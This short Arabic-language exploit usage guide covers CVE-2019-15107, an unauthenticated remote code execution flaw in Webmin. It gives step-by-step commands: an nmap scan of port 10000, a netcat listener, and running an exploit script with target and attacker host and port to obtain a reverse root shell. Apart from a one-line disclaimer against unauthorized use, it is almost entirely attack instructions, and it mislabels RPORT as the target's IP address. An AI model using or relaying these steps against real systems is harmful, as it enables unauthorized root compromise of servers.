
CVE-2019–15107 - ثغرة تنفيذ تعليمات برمجية عن بعد دون مصادقة في Webmin <=1.920
يجب أن يمنحك هذا السكربت بايثون شل جذر على Webmin 1.890
التحقق باستخدام nmap:
nmap -sC -sV -p 10000 TARGET_IP
النتيجة:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
كيفية استخدام هذا الاستغلال:
الخطوة 1:
nc -lnvp LPORT
الخطوة 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = الهدف
RPORT = عنوان IP الهدف (عادة 10000)
LHOST = جهاز كالي الخاص بك
LPORT = منفذ الشل العكسي الخاص بك
الخطوة 3: احصل على شل جذر!
لا تضر الأنظمة غير المصرح بها!!!